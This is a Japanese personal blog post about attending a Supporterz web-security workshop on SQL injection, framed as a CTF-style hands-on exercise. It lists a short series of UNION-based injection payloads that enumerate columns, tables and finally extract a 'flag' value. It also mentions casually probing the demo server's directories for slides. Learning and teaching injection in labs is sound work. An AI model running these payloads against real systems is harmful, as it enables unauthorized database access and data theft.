努力なくして力なし

株式会社Ripariaの代表です。新潟在住の大学院生です。都会と地方をつなぐ会社を作っています。セキュリティやIT企業でのインターンに関する記事が多いです。

初! サポーターズのイベントに参加させていただきました!

現在2週間東京にてインターンシップに参加しており、何かイベントないかな?と思い、調べたところ、、、

なんとサポーターズさんがセキュリティに関するイベントを開催しているではないか!

これはこれはと思い、参加させていただきました。

 

目次 

 

サポーターズとは

簡単に言うと、東京などの首都圏での説明会や選考などのイベントに伺う際に、交通費をサポーターズが支給してくださるという、就活をサポートしてくれるサービスです。

知ったのは最近なのですが、地方の学生エンジニアの方のためにあるようなサービスです。今回が初めてで、オリジナルイベントでしたので交通費の支給などはなかったのですが、実際に就活が始まったら活用できればいいなと思っています。

supporterz.jp

今回の回

「開発者のためのWebセキュリティ入門〜Burpを用いた脆弱性の発見方法〜」

ということで、CTFのWeb問題のような内容でした。短時間でしたのでSQLインジェクションに関する説明のみでしたが、とても楽しく聴くことができました。

講師紹介

講師をしてくださったのは、廣田さんです。

以下にサポーターズのサイトから引用させていただきました。

廣田 一貴(a.k.a. ひろたん)
2011年4月、とあるサイトでWebセキュリティに触れたことをきっかけに、脆弱性診断やCTFに興味を持つ。
2015年慶応義塾大学環境情報学部卒。同年三井物産セキュアディレクションに入社し、
現在までWeb脆弱性診断に従事。
2015年,2016年セキュリティ・キャンプ講師。

講義内容

検索欄にSQLインジェクションを行なっていくハンズオンでした。

 まず、カラム数と表示場所を探していき、テーブル名を取れたら、中身を見ていくという感じでした。(この解釈で合っているのかな?)

教えられた通りにやっていくと、なるほどと思うのですが、実際に一人で最初からとなるとなかなかできなそうだなと感じました。

X' UNION SELECT 0;--

X' UNION SELECT 0,0;--

X' UNION SELECT 0,0,0;--

X' UNION SELECT 0,1,2;--

X' UNION SELECT 0,table_name,0 FROM information_schema.tables;--

X' UNION SELECT 0,column_name,0 FROM information_schema.columns WHERE table_name = 'flag';--

X' UNION SELECT 0,value,0 FROM flag; --

 この類の勉強をしていく上で参考になる文献を色々と紹介していただけたので、今度買ってみたいと思います。

https://www.amazon.co.jp/体系的に学ぶ-安全なWebアプリケーションの作り方-脆弱性が生まれる原理と対策の実践-徳丸-浩/dp/4797361190/ref=tmm_hrd_swatch_0?_encoding=UTF8&qid=&sr=

d.hatena.ne.jp

感想

短い時間でしたが、濃い内容の講義を受けれたなと思いました。

個人的にパワーポイントが欲しいなと思い、

demo/ sqli.php

の上のディレクトリを色々と探してみました。

Slideというリンクがあったのですが、サーバ上にリンク先が上がっていませんでした…残念。

終わりに

サポーターズの方を初め、講師の廣田さん、ありがとうございました。

セキュリティに関するこういったイベントはあまり多くないと思うので、セキュリティに興味のある方々と知り合うことができる場を提供していただけることは大変嬉しいことです。

また、刺激を受けたので、CTFやその他諸々勉強頑張っていきたいと思います。

個人的には、最後に行ったインフェルノというボードゲームが楽しかったです(笑)